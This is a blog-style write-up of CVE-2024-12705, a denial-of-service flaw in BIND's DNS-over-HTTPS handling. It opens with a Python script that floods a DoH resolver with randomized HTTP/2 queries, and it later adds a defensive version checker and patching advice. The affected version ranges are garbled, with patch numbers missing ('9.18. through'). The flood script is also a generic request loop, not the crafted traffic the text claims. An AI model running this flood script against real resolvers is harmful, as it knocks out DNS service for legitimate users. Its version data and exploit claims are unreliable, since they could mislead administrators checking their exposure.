CVE-2024-12705 describes a significant vulnerability in BIND's DNS-over-HTTPS (DoH) handling. Clients using DoH can exhaust a DNS resolver's CPU and memory by flooding it with crafted valid or invalid HTTP/2 traffic. This flaw affects BIND 9 versions 9.18. through 9.18.32, 9.20. through 9.20.4, 9.21. through 9.21.3, and 9.18.11-S1 through 9.18.32-S1. In this post, we will discuss the code snippets, provide links to original references, and describe the exploit details.

Code snippets

The following code snippet, written in Python, demonstrates a simple proof-of-concept for generating a large number of HTTP/2 requests to flood a DoH resolver:

import requests
from hyper.contrib import HTTP20Adapter  # HTTP/2 transport adapter for requests
import random
import string

def generate_random_string(length):
    # Build a random ASCII-letter string to use as a throwaway query name.
    return ''.join(random.choice(string.ascii_letters) for _ in range(length))

def flood_doh_resolver(target_resolver_url, num_requests):
    # Route every request for this URL prefix through the HTTP/2 adapter.
    session = requests.Session()
    session.mount(target_resolver_url, HTTP20Adapter())

    for _ in range(num_requests):
        random_query = generate_random_string(25)
        session.get(target_resolver_url + random_query)

target_resolver_url = "https://example-doh-resolver.com/dns-query?name="
num_requests = 10000
flood_doh_resolver(target_resolver_url, num_requests)

Here, we use the "requests" library along with the "hyper.contrib" HTTP/2 adapter to generate a large number of HTTP/2 requests. We then create random query strings and make GET requests to a target DoH resolver.

Original references

To read more about the BIND versions affected by this vulnerability, the following resources should prove helpful:

1. CVE-2024-12705 in the CVE database
2. ISC's changelog for BIND
3. Discussion on DoH and its impact on server resources

Exploit details

To exploit this vulnerability, an attacker can craft valid or invalid HTTP/2 traffic and flood a target DoH resolver. This can be done using a variety of tools and programming languages, but a common method is to use HTTP/2-capable libraries in Python, Go, or Node.js to create a series of randomized DNS query strings. These strings are then sent as GET requests to overwhelm the target DoH resolver.

Due to the issues that arise from resource exhaustion, a DoH resolver can fail to respond to legitimate DNS queries from clients. The target resolver may also crash or hang, requiring a manual restart.

As mentioned previously, this vulnerability affects multiple versions of BIND, an open-source DNS server. Users are encouraged to patch their BIND instances or upgrade to a non-vulnerable version to mitigate the associated risk.
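As an added example (not part of the original post), the following Python helper checks whether a BIND version string, as printed by `named -v`, falls inside the affected ranges listed above. It assumes the output begins with "BIND major.minor.patch" optionally followed by an "-S1" edition tag; for the 9.18, 9.20 and 9.21 mainline branches the first release of each branch is treated as the lower bound, so only the upper bound is compared.

```python
import re

# Affected ranges as stated in the advisory text above.
# Key: (major, minor, edition); value: (min_patch or None, max_patch).
# None means "from the first release of the branch" (assumption: the
# text gives no explicit lower patch level for the mainline branches).
AFFECTED = {
    (9, 18, ""):   (None, 32),
    (9, 20, ""):   (None, 4),
    (9, 21, ""):   (None, 3),
    (9, 18, "S1"): (11, 32),   # Supported Preview edition range
}

# Matches "9.18.32" or "9.18.32-S1"; trailing build/ESV text is ignored.
VERSION_RE = re.compile(r"\b(\d+)\.(\d+)\.(\d+)(?:-(S\d+))?")

def parse_bind_version(text):
    """Return (major, minor, patch, edition) from named -v style output."""
    m = VERSION_RE.search(text)
    if not m:
        raise ValueError(f"no BIND version found in: {text!r}")
    major, minor, patch, edition = m.groups()
    return int(major), int(minor), int(patch), edition or ""

def is_affected(text):
    """True if the version in `text` lies in a CVE-2024-12705 affected range."""
    major, minor, patch, edition = parse_bind_version(text)
    rng = AFFECTED.get((major, minor, edition))
    if rng is None:
        return False            # branch/edition not listed as affected
    lo, hi = rng
    return (lo is None or patch >= lo) and patch <= hi

if __name__ == "__main__":
    # Constructed sample outputs; the real check would feed in `named -v`.
    samples = [
        "BIND 9.18.30 (Extended Support Version)",   # affected
        "BIND 9.18.33 (Extended Support Version)",   # beyond stated range
        "BIND 9.20.4",                               # affected
        "BIND 9.18.32-S1",                           # affected (S1 edition)
        "BIND 9.18.10-S1",                           # below S1 lower bound
        "BIND 9.16.50",                              # branch not listed
    ]
    for s in samples:
        print(f"{s:45} affected={is_affected(s)}")
```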

Conclusion

The vulnerability identified in CVE-2024-12705 exposes a potential attack vector for clients leveraging DNS-over-HTTPS (DoH) to exhaust a DNS resolver's CPU and memory resources. It is crucial for server administrators to apply necessary patches and upgrades to BIND if affected by this vulnerability, and for developers to be aware of potential issues when integrating DoH support into applications. As with any software, staying up to date and informed about security vulnerabilities is essential to maintaining a safe and secure internet environment.

Timeline

Published on: 01/29/2025 22:15:28 UTC
Last modified on: 02/07/2025 17:15:30 UTC